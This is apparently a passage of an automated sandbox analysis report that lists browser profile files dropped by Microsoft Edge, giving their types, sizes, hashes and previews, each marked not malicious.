                                                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 8, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):20480
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):2.8236400153893726
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:192:tTrZbiRgpnbS6lFtvi2PRGja0C50c4p0L/ZJVb:V1b+qS6l3vi2l0lp0LhJVb
                                                                                                                                                                                                                                                                                                                          MD5:88931E44EB3FD3EEB4755B189EF5D189
                                                                                                                                                                                                                                                                                                                          SHA1:2E7D76FDC149E1697082239EC203C1D582ED0341
                                                                                                                                                                                                                                                                                                                          SHA-256:2E1FFD8C636C20E66B766E9E9BD76B0F31D58DBA2B1ED6DAD9C5CBD91621EFE3
                                                                                                                                                                                                                                                                                                                          SHA-512:AB6B3CE530C7E97E106E65115E2831D34BE6994D627FF648BD039299815F57A3325ECC85872C82AF6B8CFBF714F0762375CCDA8586CEB78634C3CC71A0D72C35
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Reporting and NEL

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):36864
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):1.2136308863565346
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:48:TFkIopKWurJNVr1GJmA8pv82pfurJNVrdHXuccaurJN2VrJ1n4n1GmzNGU1cSB9N:JkIEumQv8m1ccnvS6eqmUlv
                                                                                                                                                                                                                                                                                                                          MD5:763EB852B8E6C0AB7AFA285C4B2CB022
                                                                                                                                                                                                                                                                                                                          SHA1:E27EBAFBB7DC98F05352ED9C337E5B1BFEBBC216
                                                                                                                                                                                                                                                                                                                          SHA-256:64ACA90C40077FBA3E7ED10E01F1EC3ABB3D5AC6AC3C969283E8CF1A363CEA6D
                                                                                                                                                                                                                                                                                                                          SHA-512:BF793BA9D60608303764BC9C013BE83403651D198CE2CC4C64D6C16C76746D88747298615EB8B7969ECF421720ABEDF7ADABBA017C37C97F36F23360FD14785C
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g...D.........7............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports (copy)

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):2
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                          MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                          SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                          SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                          SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:[]

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF42586.TMP (copy)

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):2
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                          MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                          SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                          SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                          SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:[]

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF43303.TMP (copy)

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):2
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                          MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                          SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                          SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                          SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:[]

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries (copy)

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):40
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                                                          MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                                                          SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                                                          SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                                                          SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\bdfa1bce-3e17-4d6c-b423-dcd9cf66d73d.tmp

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):40
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                                                          MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                                                          SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                                                          SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                                                          SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\fda49450-76e0-4a9b-b7ac-d60f93ec1970.tmp

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):2
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                                          MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                                          SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                                          SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                                          SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:[]

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Nurturing\campaign_history

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):20480
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):0.8350301952073809
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:24:TLSOUOq0afDdWec9sJlAMoqsgC7zn2z8ZI7J5fc:T+OUzDbg3sAM/sgCnn2ztc
                                                                                                                                                                                                                                                                                                                          MD5:0DAD8D7F079797377CD56DAE47E1A619
                                                                                                                                                                                                                                                                                                                          SHA1:A353C01C5B9BA9E0315ABA74D3337B7D6EE97CB2
                                                                                                                                                                                                                                                                                                                          SHA-256:7BDA584E0C1BE9E104065370FD279A7E771D7EB4F7E4CC7C80F146931F150E33
                                                                                                                                                                                                                                                                                                                          SHA-512:5A57C0D303672564DDEAA08B5DAAEE1BA24B67C46100720CE69F0908427ACE55F330D96A772D0E1F96B595FBBD70E6145AA464FC4F312EFE095F9AC909E304E8
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences (copy)

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (16838), with no line terminators
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):16842
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.451689355279723
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:384:sthPGKSu4VsbAbkfhZUXBokbGIQwY6WTaTY7u:sTOxuJZf7UVbGXffaTY7u
                                                                                                                                                                                                                                                                                                                          MD5:FA88B39BE5EA1E6396273CBDB98D69A4
                                                                                                                                                                                                                                                                                                                          SHA1:AE12604F1FDB0FB6492175D530FAC16766003CFE
                                                                                                                                                                                                                                                                                                                          SHA-256:E8C511A4114499BAF731B32C250217B962188E379447EC459DB3FC63BE9B62BB
                                                                                                                                                                                                                                                                                                                          SHA-512:CFE4DCDC9DBA86F48DE154DC1774F9F4A0408FBBA191B4D8DC70F675475DF9662F9B96671D93328EA192D276D5471174468FFB27E2A6BCFBB7B97FE8EBAE96B0
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13381172585670247","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF4634a.TMP (copy)

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (16838), with no line terminators
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):16842
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.451689355279723
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:384:sthPGKSu4VsbAbkfhZUXBokbGIQwY6WTaTY7u:sTOxuJZf7UVbGXffaTY7u
                                                                                                                                                                                                                                                                                                                          MD5:FA88B39BE5EA1E6396273CBDB98D69A4
                                                                                                                                                                                                                                                                                                                          SHA1:AE12604F1FDB0FB6492175D530FAC16766003CFE
                                                                                                                                                                                                                                                                                                                          SHA-256:E8C511A4114499BAF731B32C250217B962188E379447EC459DB3FC63BE9B62BB
                                                                                                                                                                                                                                                                                                                          SHA-512:CFE4DCDC9DBA86F48DE154DC1774F9F4A0408FBBA191B4D8DC70F675475DF9662F9B96671D93328EA192D276D5471174468FFB27E2A6BCFBB7B97FE8EBAE96B0
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13381172585670247","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF49c2d.TMP (copy)

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (16838), with no line terminators
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):16842
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.451689355279723
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:384:sthPGKSu4VsbAbkfhZUXBokbGIQwY6WTaTY7u:sTOxuJZf7UVbGXffaTY7u
                                                                                                                                                                                                                                                                                                                          MD5:FA88B39BE5EA1E6396273CBDB98D69A4
                                                                                                                                                                                                                                                                                                                          SHA1:AE12604F1FDB0FB6492175D530FAC16766003CFE
                                                                                                                                                                                                                                                                                                                          SHA-256:E8C511A4114499BAF731B32C250217B962188E379447EC459DB3FC63BE9B62BB
                                                                                                                                                                                                                                                                                                                          SHA-512:CFE4DCDC9DBA86F48DE154DC1774F9F4A0408FBBA191B4D8DC70F675475DF9662F9B96671D93328EA192D276D5471174468FFB27E2A6BCFBB7B97FE8EBAE96B0
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13381172585670247","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF4c7e0.TMP (copy)

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (16838), with no line terminators
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):16842
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.451689355279723
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:384:sthPGKSu4VsbAbkfhZUXBokbGIQwY6WTaTY7u:sTOxuJZf7UVbGXffaTY7u
                                                                                                                                                                                                                                                                                                                          MD5:FA88B39BE5EA1E6396273CBDB98D69A4
                                                                                                                                                                                                                                                                                                                          SHA1:AE12604F1FDB0FB6492175D530FAC16766003CFE
                                                                                                                                                                                                                                                                                                                          SHA-256:E8C511A4114499BAF731B32C250217B962188E379447EC459DB3FC63BE9B62BB
                                                                                                                                                                                                                                                                                                                          SHA-512:CFE4DCDC9DBA86F48DE154DC1774F9F4A0408FBBA191B4D8DC70F675475DF9662F9B96671D93328EA192D276D5471174468FFB27E2A6BCFBB7B97FE8EBAE96B0
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13381172585670247","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences (copy)

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):38626
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.554568395177905
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:768:CJakCwh7pLGLhgGWPSMf0V8F1+UoAYDCx9Tuqh0VfUC9xbog/OVjE0TMkUrwCsKL:CJakCwXchgGWPSMf0Vu1ja95kNCsKNvB
                                                                                                                                                                                                                                                                                                                          MD5:25403A3A82CD106DF8F34777BF7BBD3B
                                                                                                                                                                                                                                                                                                                          SHA1:5D76480B317925C5686C44E3BD397B5AAB18E65C
                                                                                                                                                                                                                                                                                                                          SHA-256:571D3E6A2C9C11C464BD046D546C3E7680A77993361472A1D760CCA9B8EB8497
                                                                                                                                                                                                                                                                                                                          SHA-512:79561E1B1DE6E2B097A28CEF93CD4BEE0FE40227105525582818D84387A6F76304A8204F5918036363CB242A16794C6F8DDA77E6887266EDA67A8D4FB4C14E6F
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13381172585188217","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13381172585188217","location":5,"ma

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences~RF4849d.TMP (copy)

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):38626
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.554568395177905
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:768:CJakCwh7pLGLhgGWPSMf0V8F1+UoAYDCx9Tuqh0VfUC9xbog/OVjE0TMkUrwCsKL:CJakCwXchgGWPSMf0Vu1ja95kNCsKNvB
                                                                                                                                                                                                                                                                                                                          MD5:25403A3A82CD106DF8F34777BF7BBD3B
                                                                                                                                                                                                                                                                                                                          SHA1:5D76480B317925C5686C44E3BD397B5AAB18E65C
                                                                                                                                                                                                                                                                                                                          SHA-256:571D3E6A2C9C11C464BD046D546C3E7680A77993361472A1D760CCA9B8EB8497
                                                                                                                                                                                                                                                                                                                          SHA-512:79561E1B1DE6E2B097A28CEF93CD4BEE0FE40227105525582818D84387A6F76304A8204F5918036363CB242A16794C6F8DDA77E6887266EDA67A8D4FB4C14E6F
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13381172585188217","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13381172585188217","location":5,"ma

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\000001.dbtmp

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):16
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                                          MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                                          SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                                          SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                                          SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\000003.log

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                          Category:dropped
